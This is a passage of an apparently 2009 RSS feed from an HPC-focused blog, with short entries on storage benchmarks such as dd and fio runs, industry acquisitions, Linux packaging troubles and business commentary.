      <description>As seen on InsideHPC, John West notes that the assets of Star-P were purchased by Microsoft today. Parsing of words is important. The phrase &amp;ldquo;acquired the assets of X&amp;rdquo; means that the IP was purchased. John points to the blog post where Kyril Faenov mentions that some of the staff will work at the Microsoft Cambridge site. This is, sadly, not a great exit for Star-P. Acquiring assets usually means the choice was either to shut down the company and auction the bits off, or to find a buyer for the distressed assets and then wind down the rest of the organization that doesn&amp;rsquo;t go with them.</description>
    </item>
    
    <item>
      <title>The looming (storage) bandwidth wall</title>
      <link>https://blog.scalability.org/2009/09/the-looming-storage-bandwidth-wall/</link>
      <pubDate>Mon, 21 Sep 2009 17:36:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/the-looming-storage-bandwidth-wall/</guid>
      <description>This has been bugging me for a while. Here is a simple measure of the height of the bandwidth wall. Take the size of your storage, and divide it by the maximum speed of your access to the data. This is the height of your wall, as measured in seconds. The time to read your data. The higher the wall, the more time you need to read your data. Ok, let&amp;rsquo;s apply this in practice.</description>
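The measure described above reduces to one division; a minimal sketch follows. The capacity and bandwidth figures are illustrative assumptions, not numbers taken from the post.

```python
# "Bandwidth wall" height: storage capacity divided by maximum
# access bandwidth, measured in seconds -- the minimum time
# needed to read all of your data.
def wall_seconds(capacity_bytes, bandwidth_bytes_per_sec):
    return capacity_bytes / bandwidth_bytes_per_sec

TB = 10**12
# e.g. 100 TB of storage behind a 2 GB/s pipe:
print(wall_seconds(100 * TB, 2 * 10**9) / 3600)  # roughly 13.9 hours
```

The wall grows linearly with capacity, so doubling the storage behind the same pipe doubles the time to touch all of it.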
    </item>
    
    <item>
      <title>M&amp;A continues:  Dell snarfs up PDS</title>
      <link>https://blog.scalability.org/2009/09/ma-continues-dell-snarfs-up-pds/</link>
      <pubDate>Mon, 21 Sep 2009 16:13:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/ma-continues-dell-snarfs-up-pds/</guid>
      <description>This is going to make a few Dell partners (Wipro et al) nervous. Sort of like the HP acquisition of EDS did. Is it possible that the service providers are going to be snapped up now to provide differentiated value in the face of declining revenues for hardware? Does this mean anything for HPC or storage?
Not this particular acquisition. Perot Systems wasn&amp;rsquo;t/isn&amp;rsquo;t really a player in HPC to any significant degree.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-09-16</title>
      <link>https://blog.scalability.org/2009/09/twitter-updates-for-2009-09-16/</link>
      <pubDate>Wed, 16 Sep 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/twitter-updates-for-2009-09-16/</guid>
      <description>* @[chris_bloke](http://twitter.com/chris_bloke) Oddly, I seem to remember my business partner working on stuff like this last year at his day job. Will ask. [in reply to chris_bloke](http://twitter.com/chris_bloke/statuses/3952863681) [#](http://twitter.com/sijoe/statuses/4005434311)  Powered by Twitter Tools</description>
    </item>
    
    <item>
      <title>We&#39;re Back!</title>
      <link>https://blog.scalability.org/2009/09/were-back-2/</link>
      <pubDate>Tue, 15 Sep 2009 04:54:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/were-back-2/</guid>
      <description>We were knocked off the air around 11pm on 13-September, by a machine finally deciding to give up the ghost. A partially retired machine which happened to run scalability.org decided, finally, that it no longer wished to correctly run grub. Grub being the thing essential to booting. Like the bootloader. Yeah. It was one of those nights.
I haven&amp;rsquo;t finished figuring out why it died, and I am still working on restoring the services.</description>
    </item>
    
    <item>
      <title>Using fio to probe IOPs and detect internal system features</title>
      <link>https://blog.scalability.org/2009/09/using-fio-to-probe-iops-and-detect-internal-system-features/</link>
      <pubDate>Sat, 12 Sep 2009 14:29:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/using-fio-to-probe-iops-and-detect-internal-system-features/</guid>
      <description>Scalable Informatics JackRabbit JR3 16TB storage system, 12.3TB usable.
[root@jr3 ~]# df -m /data
Filesystem           1M-blocks      Used Available Use% Mounted on
/dev/sdc2             12382376    425990  11956387   4% /data
[root@jr3 ~]# df -h /data
Filesystem            Size  Used Avail Use% Mounted on
/dev/sdc2              12T  417G   12T   4% /data
These tests are more to show the quite remarkable utility of the fio tool than anything else. You can probe real issues in your system (as compared to a broad swath of &amp;lsquo;benchmark&amp;rsquo; tools that don&amp;rsquo;t really provide a useful or meaningful measure of anything). This is on a RAID6, so it&amp;rsquo;s not really optimal for seeks.</description>
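For reference, an IOPs probe of the kind described can be expressed as an fio job file. The file name, size, queue depth, and runtime below are illustrative assumptions, not the settings used in the post.

```ini
; random-read IOPs probe (illustrative settings)
[randread-probe]
filename=/data/fio-probe.bin
size=4g
rw=randread
bs=4k
direct=1
ioengine=libaio
iodepth=32
runtime=30
time_based=1
```

Running it with `fio randread-probe.fio` reports IOPs and latency figures for the device backing /data; varying `bs` and `iodepth` is how one teases out internal system features such as cache and seek behavior.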
    </item>
    
    <item>
      <title>Scalable Informatics JackRabbit JR3 streaming benchmarks ... the next generation</title>
      <link>https://blog.scalability.org/2009/09/scalable-informatics-jackrabbit-jr3-streaming-benchmarks-the-next-generation/</link>
      <pubDate>Sat, 12 Sep 2009 01:33:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/scalable-informatics-jackrabbit-jr3-streaming-benchmarks-the-next-generation/</guid>
      <description>Previously, JackRabbit JR3 units, with single RAID cards, have been hovering around 750MB/s read and write. This was our second generation unit. First generation units were about 600 MB/s +/- a bit. The third generation unit is faster.
[root@jr3 ~]# dd if=/dev/zero of=/data/big.file ...
4096+0 records in
4096+0 records out
68719476736 bytes (69 GB) copied, 84.9058 seconds, 809 MB/s
[root@jr3 ~]# dd if=/data/big.file of=/dev/null ...
4096+0 records in
4096+0 records out
68719476736 bytes (69 GB) copied, 66.</description>
    </item>
    
    <item>
      <title>Scalable Informatics is now part of the HPC Advisory council</title>
      <link>https://blog.scalability.org/2009/09/scalable-informatics-is-now-part-of-the-hpc-advisory-council/</link>
      <pubDate>Fri, 11 Sep 2009 20:20:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/scalable-informatics-is-now-part-of-the-hpc-advisory-council/</guid>
      <description>For the day job &amp;hellip; We are happy about joining this group. Interest in our high performance storage and computing systems continues to grow across multiple sectors. As users need to store and process exponentially growing amounts of data, they need systems, fabrics and designs capable of scaling without introducing additional barriers. This group represents those that build and those that use such technology.</description>
    </item>
    
    <item>
      <title>Not going to attend OLF this year, even though we want to</title>
      <link>https://blog.scalability.org/2009/09/not-going-to-attend-olf-this-year-even-though-we-want-to/</link>
      <pubDate>Fri, 11 Sep 2009 02:34:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/not-going-to-attend-olf-this-year-even-though-we-want-to/</guid>
      <description>Ohio Linux Fest is September 25-27, 2009 in Columbus OH this year. Sadly we won&amp;rsquo;t be going. The major reason we won&amp;rsquo;t be going is we plan to be at (or driving to) a customer site during that weekend. We are building a storage cluster for this customer, and we will be talking about it soon. The secondary reason is we are looking to more carefully deploy our marketing budget. There is a possibility of sharing a booth with a partner at SC09, and we don&amp;rsquo;t have an infinitely deep marketing budget, so I have to make choices.</description>
    </item>
    
    <item>
      <title>Fighting the dmraid/mdadm battles in initrd for RHEL/Centos 5.x</title>
      <link>https://blog.scalability.org/2009/09/fighting-the-dmraidmdadm-battles-in-initrd-for-rhelcentos-5-x/</link>
      <pubDate>Wed, 09 Sep 2009 04:11:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/fighting-the-dmraidmdadm-battles-in-initrd-for-rhelcentos-5-x/</guid>
      <description>dmraid is a technology to turn on-board fake-RAID (fRAID) systems into usable/bootable linux machines. It works for what it does, but you do need to be careful, as many of the fRAID chipsets have interesting &amp;hellip; er &amp;hellip; features. Yeah. That&amp;rsquo;s it, features. mdadm is a pure software version, requiring no assist from the BIOS. It can handle setting up RAID devices, and is our preferred way of creating RAID in software.</description>
    </item>
    
    <item>
      <title>sorry about the downtime ... quick OS upgrade on the server</title>
      <link>https://blog.scalability.org/2009/09/sorry-about-the-downtime-quick-os-upgrade-on-the-server/</link>
      <pubDate>Tue, 08 Sep 2009 04:38:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/sorry-about-the-downtime-quick-os-upgrade-on-the-server/</guid>
      <description>Been meaning to do this for a while. Of course, after I did this, the DB broke. And then I had to fix that. Ok, the DB itself didn&amp;rsquo;t break, but the install of it did. Long story, not worth telling. Punchline: with some RPM and yum commands, I eradicated the evil bits and allowed the good bits to prevail. Yeah, I know, I should just virtualize the box and run it wherever.</description>
    </item>
    
    <item>
      <title>Non-locality in computing</title>
      <link>https://blog.scalability.org/2009/09/non-locality-in-computing/</link>
      <pubDate>Sun, 06 Sep 2009 10:11:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/non-locality-in-computing/</guid>
      <description>I read an article a few weeks ago that mirrors some of the things I&amp;rsquo;ve said in the past about computing on huge systems. Basically, when you have a system of sufficiently large size, the communications fabric between the nodes is such that, for any ith and jth node, the latencies and transit times may not be uniform; or worse, there may be a significant time cost to communicate between various nodes.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-09-05</title>
      <link>https://blog.scalability.org/2009/09/twitter-updates-for-2009-09-05/</link>
      <pubDate>Sat, 05 Sep 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/twitter-updates-for-2009-09-05/</guid>
      <description>* I just added myself to [http://twitr.org](http://twitr.org) Twitter Directory under #[hpc](http://search.twitter.com/search?q=%23hpc) #[storage](http://search.twitter.com/search?q=%23storage) #[accelerated](http://search.twitter.com/search?q=%23accelerated) [#](http://twitter.com/sijoe/statuses/3755531868)  Powered by Twitter Tools</description>
    </item>
    
    <item>
      <title>Zombie modeling, a possible new HPC application?</title>
      <link>https://blog.scalability.org/2009/09/zombie-modeling-a-possible-new-hpc-application/</link>
      <pubDate>Sat, 05 Sep 2009 00:50:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/zombie-modeling-a-possible-new-hpc-application/</guid>
      <description>I had a laugh when I read Professor Robert Smith?&amp;rsquo;s home page (the question mark is really there).
Ok &amp;hellip; imagine having a thesis advisor like this &amp;hellip; Man, that would be fun research! Shaun of the Dead as source material &amp;hellip;
Seriously &amp;hellip; he has a paper on zombie modeling, and from the first few pages I glanced through, I actually think I understood it. His focus is epidemiology. This is certainly something worthwhile, and it appears that the zombie modeling uses the zombie as a placeholder for some unknown infectious disease with specific characteristics.</description>
    </item>
    
    <item>
      <title>Now thats one big pepperoni pizza!</title>
      <link>https://blog.scalability.org/2009/09/now-thats-one-big-pepperoni-pizza/</link>
      <pubDate>Fri, 04 Sep 2009 19:24:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/now-thats-one-big-pepperoni-pizza/</guid>
      <description>Get ready to laugh a little &amp;hellip;
landman@metal:~$ dd if=/dev/zero of=big-huge-file-system-target.img bs=1k seek=2T count=1
1+0 records in
1+0 records out
1024 bytes (1.0 kB) copied, 4.4349e-05 s, 23.1 MB/s
landman@metal:~$ ls -alF big-huge-file-system-target.img
-rw-r--r-- 1 landman landman 2251799813686272 2009-09-04 17:25 big-huge-file-system-target.img
landman@metal:~$ ls -alhF big-huge-file-system-target.img
-rw-r--r-- 1 landman landman 2.1P 2009-09-04 17:25 big-huge-file-system-target.img
2.1PB file &amp;hellip; eh? Not so much &amp;hellip;
landman@metal:~$ ls -aslhF big-huge-file-system-target.img
4.0K -rw-r--r-- 1 landman landman 2.</description>
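The trick behind the joke is easy to reproduce: seeking far past end-of-file before writing creates a sparse file, whose apparent size dwarfs its allocated blocks. A minimal Python sketch (file name and sizes are illustrative, not from the post):

```python
import os

# Seek past EOF, then write one small block: the filesystem records
# a huge apparent size but only allocates the block actually written.
path = "sparse-demo.img"
with open(path, "wb") as f:
    f.seek(2**31)            # jump 2 GiB past the start, writing nothing
    f.write(b"\x00" * 1024)  # then write a single 1 KiB block

st = os.stat(path)
print(st.st_size)          # apparent size: 2 GiB + 1 KiB
print(st.st_blocks * 512)  # bytes actually allocated: a few KiB at most
os.remove(path)
```

The `ls -s` column in the transcript above is the same distinction: apparent size 2.1P, allocated size 4.0K.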
    </item>
    
    <item>
      <title>HPC for Dummies book!</title>
      <link>https://blog.scalability.org/2009/09/hpc-for-dummies-book/</link>
      <pubDate>Fri, 04 Sep 2009 18:32:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/hpc-for-dummies-book/</guid>
      <description>Doug Eadline has an e-book out. From the posting on Beowulf:
It appears to be Windows/Mac only though (not Doug&amp;rsquo;s fault, don&amp;rsquo;t blame him). Hopefully a sane version (e.g. PDF) will be generated soon. Doug is, of course, the chief monkey at Cluster Monkey, and an all around good guy.</description>
    </item>
    
    <item>
      <title>Nailed it ...  unfortunately</title>
      <link>https://blog.scalability.org/2009/09/nailed-it-unfortunately/</link>
      <pubDate>Fri, 04 Sep 2009 12:56:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/nailed-it-unfortunately/</guid>
      <description>This article is right on the money.
Yeah, sounds about right. The state&#39;s 21st century fund is &amp;ldquo;investing&amp;rdquo; in buggy whips &amp;hellip; advanced manufacturing, homeland security, energy, and biotech. Which are things that this state is not known for. But the &amp;ldquo;investments&amp;rdquo; are poorly done, which might even be an optimistic view of them, with the focus areas and investment process being &amp;hellip; well &amp;hellip; not well thought out. Politically, it plays well to various interests.</description>
    </item>
    
    <item>
      <title>Oracle &#43; Sun roundup</title>
      <link>https://blog.scalability.org/2009/09/oracle-sun-roundup/</link>
      <pubDate>Fri, 04 Sep 2009 11:03:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/oracle-sun-roundup/</guid>
      <description>First is the news that the merger may be running afoul of the European regulators. It would be a (terminal) disaster for Sun if it did. Their revenues continue to crater quarter after quarter. Customers do not like uncertainty. The rationale for this is reduction in competition in the DB market. Because of MySQL. Though, if you read other technical blogs and news sources covering MySQL, Sun seems to have managed to piss off its community of users and contributors.</description>
    </item>
    
    <item>
      <title>Which CPU is faster, 3.2 GHz Nehalem W5580 or 2.6 GHz Istanbul?</title>
      <link>https://blog.scalability.org/2009/09/which-cpu-is-faster-3-2-ghz-nehalem-w5580-or-2-6-ghz-istanbul/</link>
      <pubDate>Thu, 03 Sep 2009 11:13:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/which-cpu-is-faster-3-2-ghz-nehalem-w5580-or-2-6-ghz-istanbul/</guid>
      <description>Yes this is a loaded question. The context I use is a very simple double precision floating point loop, with the interior re-written to use SSE2. The idea is, if we run the identical program on the same machine, running one core, doing little else but double precision FP operations (in this case, computing the Riemann Zeta Function), with very little to no memory traffic &amp;hellip; which CPU core will win on this very simple sprint?</description>
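The workload in question is a tight partial sum; here is a scalar Python sketch of it. The post&amp;rsquo;s actual kernel is the same loop written in double-precision C with the interior rewritten in SSE2, so this only illustrates the arithmetic being timed, not the vectorization.

```python
# Partial sum of the Riemann zeta function zeta(s): the kind of
# tight double-precision FP loop used as a single-core "sprint"
# benchmark. Scalar sketch only; the benchmarked version packs two
# terms per iteration with SSE2.
def zeta_partial(s, n):
    total = 0.0
    for k in range(1, n + 1):
        total += 1.0 / k**s
    return total

print(round(zeta_partial(2, 100000), 4))  # converges toward pi**2/6 = 1.6449...
```

With almost no memory traffic, a loop like this isolates raw FP throughput per core, which is exactly why clock speed alone does not decide the Nehalem-vs-Istanbul question.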
    </item>
    
    <item>
      <title>RHEL 5.4 is out, Centos 5.4 forthcoming</title>
      <link>https://blog.scalability.org/2009/09/rhel-5-4-is-out-centos-5-4-forthcoming/</link>
      <pubDate>Wed, 02 Sep 2009 17:16:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/rhel-5-4-is-out-centos-5-4-forthcoming/</guid>
      <description>According to LWN (what, you&amp;rsquo;re not a subscriber? For shame!), Redhat EL 5.4 came out. With a long awaited feature. XFS. Redhat, it&amp;rsquo;s about time. It was added into the kernel &amp;hellip; what &amp;hellip; 8 years ago?</description>
    </item>
    
    <item>
      <title>Going to be busy with a storage cluster build for the next few weeks ...</title>
      <link>https://blog.scalability.org/2009/08/going-to-be-busy-with-a-storage-cluster-build-for-the-next-few-weeks/</link>
      <pubDate>Mon, 31 Aug 2009 00:08:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/going-to-be-busy-with-a-storage-cluster-build-for-the-next-few-weeks/</guid>
      <description>Should be fun, and I&amp;rsquo;ll talk more about it later on. Expect to see some interesting test case benchmarks start coming from us on this.</description>
    </item>
    
    <item>
      <title>Rumor of HP looking at Sun HW acquisition</title>
      <link>https://blog.scalability.org/2009/08/rumor-of-hp-looking-at-sun-hw-acquisition/</link>
      <pubDate>Mon, 31 Aug 2009 00:03:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/rumor-of-hp-looking-at-sun-hw-acquisition/</guid>
      <description>Reported on the Inquirer site. The claim is that this deal would complement the EDS services business. Hmmm&amp;hellip;. HP could take (and is taking) Sun&amp;rsquo;s business for effectively free. Why would they pay for something they can get for free? Something just doesn&amp;rsquo;t ring true about this, and I&amp;rsquo;d chalk this rumor up to more wishful thinking on the part of some of the reporter&amp;rsquo;s sources.
Never mind the regulatory hurdles HP would have to go through as one of the top hardware vendors.</description>
    </item>
    
    <item>
      <title>In the end, it is all about money</title>
      <link>https://blog.scalability.org/2009/08/in-the-end-it-is-all-about-money/</link>
      <pubDate>Fri, 28 Aug 2009 01:01:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/in-the-end-it-is-all-about-money/</guid>
      <description>An article on softpedia  discusses the state of the windows/linux client and server markets. I can personally attest to seeing Microsoft scrambling to try to turn every Linux opportunity into a windows win, but I am not sure they completely grasp what they are up against. This article amplifies this.
While I take issue with some of their wording &amp;hellip; many customers we know are using Linux, free or paid subscription &amp;hellip; precisely for the critical business needs, due to the control and cost issues.</description>
    </item>
    
    <item>
      <title>A small DeltaV test</title>
      <link>https://blog.scalability.org/2009/08/a-small-deltav-test/</link>
      <pubDate>Thu, 27 Aug 2009 11:40:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/a-small-deltav-test/</guid>
      <description>This is for a customer who wants to run a benchmark today. Wish we had a JackRabbit in the lab, but our engineering machine is at a customer site. One &amp;ldquo;blade&amp;rdquo; of a &amp;ldquo;CX1&amp;rdquo; with 3.2 GHz Nehalems, 24 GB RAM (about to bump this to 72 GB for the customer benchmark), and an SDR Infiniband connection (1 GB/s max). DeltaV3 (ΔV3) with an 8 disk RAID6 (6 data drives, maximum read speed of about 660 MB/s), and a 6 disk RAID10 (not being used for this test).</description>
    </item>
    
    <item>
      <title>M&amp;A:  Tibco snaps up DataSynapse</title>
      <link>https://blog.scalability.org/2009/08/ma-tibco-snaps-up-datasynapse/</link>
      <pubDate>Mon, 24 Aug 2009 17:41:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/ma-tibco-snaps-up-datasynapse/</guid>
      <description>See here. DataSynapse, for those who don&amp;rsquo;t know, makes tools that help financial services folks schedule work across large clusters. They are pretty big on Wall Street. They are now going to be part of Tibco. Competitors are Platform et al. As this Great Recession marches on, I do expect to see additional M&amp;amp;A activity, in order to strengthen portfolios, provide capability enhancement, and so forth. It all comes down to cost-benefit analysis.</description>
    </item>
    
    <item>
      <title>Sun&#43;Oracle update:  not done yet, but they are in a rush</title>
      <link>https://blog.scalability.org/2009/08/sunoracle-update-not-done-yet-but-they-are-in-a-rush/</link>
      <pubDate>Sun, 23 Aug 2009 13:16:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/sunoracle-update-not-done-yet-but-they-are-in-a-rush/</guid>
      <description>It was reported earlier this week that Oracle received an OK from US DOJ to acquire Sun. A new article suggests the reason for the speed.
How bad was it?
This isn&amp;rsquo;t quite a cratering &amp;hellip; unless you consider the last several quarters in a row. And this is because customers aren&amp;rsquo;t dumb; they know proprietary gear needs support (ignore the marketing &amp;hellip; if you can&amp;rsquo;t buy the same bits on the open market from more than one source, it is proprietary).</description>
    </item>
    
    <item>
      <title>Odd Gridengine &#43; OpenMPI 1.3.x interaction: non-advancing jobs</title>
      <link>https://blog.scalability.org/2009/08/odd-gridengine-openmpi-1-3-x-interaction-non-advancing-jobs/</link>
      <pubDate>Sat, 22 Aug 2009 15:15:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/odd-gridengine-openmpi-1-3-x-interaction-non-advancing-jobs/</guid>
      <description>Banging my head against this one. OpenMPI 1.3.x is IMO one of the best MPI stacks available. It makes my life easy in many regards, and most of the time, it just works. Gridengine is a venerable job scheduler, albeit one that hasn&amp;rsquo;t done a great job with MPI integration in the past. I remember writing reaper scripts to clean up after MPICH1/2 runs for various customers. Tight integration, as it is called, didn&amp;rsquo;t work that well.</description>
    </item>
    
    <item>
      <title>Try &#43; buy programs</title>
      <link>https://blog.scalability.org/2009/08/try-buy-programs/</link>
      <pubDate>Wed, 19 Aug 2009 21:57:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/try-buy-programs/</guid>
      <description>We no longer do try and buy programs. We&amp;rsquo;ve found that customers would use our unit to lever our competitors down in price, and extract additional concessions from them. Just walking them by our box with the blinkenlights and the nice logos &amp;hellip; scared quite a few sales reps into submission. Then we get our box back after the other vendor is suitably scared. There&amp;rsquo;s no upside for us, at all.</description>
    </item>
    
    <item>
      <title>Business focus ... scaling programs up</title>
      <link>https://blog.scalability.org/2009/08/business-focus-scaling-programs-up/</link>
      <pubDate>Wed, 19 Aug 2009 18:42:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/business-focus-scaling-programs-up/</guid>
      <description>This is about scalability in processes and administration of programs, not really HPC. Last month, I took advantage of cash 4 clunkers. I got rid of a car I swore to drive into the ground (which I nearly did). In 4 days, the government is finally admitting, it had 250k transactions. The dealerships were crowded. The websites, which were the font of all information and arrangements? Basically massively overloaded. Fast forward to today, where I saw this article.</description>
    </item>
    
    <item>
      <title>Rumors of Infiniband&#39;s (imminent) demise ...</title>
      <link>https://blog.scalability.org/2009/08/rumors-of-infinibands-imminent-demise/</link>
      <pubDate>Tue, 18 Aug 2009 13:32:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/rumors-of-infinibands-imminent-demise/</guid>
      <description>&amp;hellip; are greatly exaggerated. John at InsideHPC has an article on Cisco&amp;rsquo;s move out of Infiniband which refers to another article on this. I have to basically say, I&amp;rsquo;ll believe 10GbE conquering IB when I see it. Every year is proclaimed to be the year that IB is vanquished by 10GbE. I was reporting on this stuff 2+ years ago, and asked very simple questions just last year. When will 10GbE come into its own in HPC?</description>
    </item>
    
    <item>
      <title>Been excessively busy ... my apologies ...</title>
      <link>https://blog.scalability.org/2009/08/been-excessively-busy-my-apologies/</link>
      <pubDate>Mon, 17 Aug 2009 14:22:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/been-excessively-busy-my-apologies/</guid>
      <description>generating many quotes, finalizing bits on storage cluster wins (you&amp;rsquo;ll hear about this soon), taking orders, starting several benchmark and support efforts, speaking to a group to help us get started raising capital. Busy busy busy &amp;hellip;</description>
    </item>
    
    <item>
      <title>OpenSuSE issues with a few things for cluster</title>
      <link>https://blog.scalability.org/2009/08/opensuse-issues-with-a-few-things-for-cluster/</link>
      <pubDate>Mon, 10 Aug 2009 12:00:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/opensuse-issues-with-a-few-things-for-cluster/</guid>
      <description>First off, it appears that the zypper problem is solved. Zypper shares some similar command line bits with yum. This helped with a faster learning curve. Zypper also supports a feature I wish were in yum, but I use grep for. zypper search gcc and yum list | grep gcc are the same in function. Zypper is also much faster than yum. Interpreted languages don&amp;rsquo;t work so well with large data sets, such as many installation packages, and the dense dependency trees they have to construct and traverse.</description>
    </item>
    
    <item>
      <title>OpenSuSE 11.1 allows OFED 1.4.2 to compile</title>
      <link>https://blog.scalability.org/2009/08/opensuse-11-1-allows-ofed-1-4-2-to-compile/</link>
      <pubDate>Sun, 09 Aug 2009 20:51:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/opensuse-11-1-allows-ofed-1-4-2-to-compile/</guid>
      <description>Ok, we had to use our 2.6.27.9 kernel, but it works fine otherwise. This looks like a reasonable solution to the customer&amp;rsquo;s problem. We will be able to reload most of their compute nodes remotely; the head node may be more complex. I need to see if binaries compiled on OpenSuSE 10.2 will work w/o problem on OpenSuSE 11.1. I suspect so, but Ubuntu 8.xx and 9.xx used different glibc/gcc bits and caused a few hiccups for some apps.</description>
    </item>
    
    <item>
      <title>NIH syndrome:  Yum doesn&#39;t work on SuSE 11.1</title>
      <link>https://blog.scalability.org/2009/08/nih-syndrome-yum-doesnt-work-on-suse-11-1/</link>
      <pubDate>Sun, 09 Aug 2009 15:30:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/nih-syndrome-yum-doesnt-work-on-suse-11-1/</guid>
      <description>It seems that yum, a reasonably good, quite standard, and powerful tool for maintaining systems across Redhat/Centos, Fedora, and multiple other distributions &amp;hellip; was deprecated in SuSE in favor of an &amp;ldquo;Invented Here&amp;rdquo; tool such as zypper. I am running into this right now with attempting to get OFED installed on OpenSUSE 11.1 to see if this will solve a customer problem. Yum is a convenient and powerful tool, common across many distros.</description>
    </item>
    
    <item>
      <title>Cloud migrations to most beneficial tax regime ...</title>
      <link>https://blog.scalability.org/2009/08/cloud-migrations-to-most-beneficial-tax-regime/</link>
      <pubDate>Sat, 08 Aug 2009 19:43:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/cloud-migrations-to-most-beneficial-tax-regime/</guid>
      <description>I thought this was interesting. Microsoft basically pulling a plug on a large project over tax issues, and moving its capability to where it has a more favorable situation. I see a simple (and dare I say obvious) evolution in the cloud infrastructure landscape.
Take your container systems, put them on a truck and drive them to where the taxes are best. This would create demand for points of presence with good power and network connections.</description>
    </item>
    
    <item>
      <title>T&amp;C&#39;s</title>
      <link>https://blog.scalability.org/2009/08/tcs/</link>
      <pubDate>Fri, 07 Aug 2009 17:09:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/tcs/</guid>
      <description>Been very busy &amp;hellip; good busy &amp;hellip; but busy. Brief T&amp;amp;C discussion, as this is near and dear to my heart right now. We find lots of variation in T and C documentation. Some of it is reasonable, some is simply ridiculous. Call it onerous, call it egregious. The vast majority of the ridiculous language focuses on providing a huge lever over the seller by the buyer. Some of my favorites are &amp;ldquo;we can return it if we want, for any reason, and you have no recourse whatsoever&amp;rdquo;, &amp;ldquo;you will pay for our costs if we decide to go another route&amp;rdquo;, &amp;ldquo;you may not charge fees for late payment, or institute collection actions&amp;rdquo;, &amp;ldquo;you will give us most preferred customer pricing, regardless of how little we buy from you&amp;rdquo;, and &amp;ldquo;we will pay when we please&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-08-05</title>
      <link>https://blog.scalability.org/2009/08/twitter-updates-for-2009-08-05/</link>
      <pubDate>Wed, 05 Aug 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/twitter-updates-for-2009-08-05/</guid>
      <description>* @[garystiehr](http://twitter.com/garystiehr) Doug did a good job on them. We are getting many hits from #[insideHPC](http://search.twitter.com/search?q=%23insideHPC) for #[storage](http://search.twitter.com/search?q=%23storage) for #[HPC](http://search.twitter.com/search?q=%23HPC) systems now [in reply to garystiehr](http://twitter.com/garystiehr/statuses/3119965913) [#](http://twitter.com/sijoe/statuses/3134050087) * fighting battles I should not be fighting ... [#](http://twitter.com/sijoe/statuses/3134391117) * Done with one proposal, now onto an analysis, a letter of support for a proposal, a CV for the proposal, a patent analysis ... its only 11pm [#](http://twitter.com/sijoe/statuses/3138092256)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>Cilk Arts acquired by Intel</title>
      <link>https://blog.scalability.org/2009/08/cilk-arts-acquired-by-intel/</link>
      <pubDate>Tue, 04 Aug 2009 02:08:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/cilk-arts-acquired-by-intel/</guid>
      <description>Story here. InsideHPC has been covering them for a while. Cilk was/is a different approach to parallelism than language developers traditionally used. Basically it deployed various work queues for each core, and the work queues decided when they needed more work. As I remember, they could &amp;ldquo;steal&amp;rdquo; from other work queues. The net effect of this was an effectively implicitly described parallelism. I am probably explaining it wrong. It is a neat way to work, but it is focused upon C++.</description>
    </item>
    
    <item>
      <title>Real economic stimulus: lower barriers to purchase</title>
      <link>https://blog.scalability.org/2009/08/real-economic-stimulus-lower-barriers-to-purchase/</link>
      <pubDate>Sun, 02 Aug 2009 19:38:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/real-economic-stimulus-lower-barriers-to-purchase/</guid>
      <description>There is much being written about C4C (Cash for Clunkers). As I had noted in my own previous article, we did take advantage of it. So my writing is biased to some degree. I am personally opposed to wealth transfer as I noted. Those who busted their rear ends to make money ought to be able to keep it and spend it as they see fit. Barring that, if the government decides that stimulating a particular part of the economy is good, they can make things happen, in a big way.</description>
    </item>
    
    <item>
      <title>Cash for clunkers:  why it was a good idea</title>
      <link>https://blog.scalability.org/2009/07/cash-for-clunkers-why-it-was-a-good-idea/</link>
      <pubDate>Fri, 31 Jul 2009 12:46:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/cash-for-clunkers-why-it-was-a-good-idea/</guid>
      <description>This is more economic than HPC related, but it has a relationship to HPC as it turns out. Cash for clunkers was designed to replace lower MPG cars with higher MPG cars, by offering effectively a discount for purchase. The government allocated $1B to the program. It started Monday. As of today, Friday, the money is gone. Inventory was moved, it is no longer aging, and higher MPG cars are now on the roads.</description>
    </item>
    
    <item>
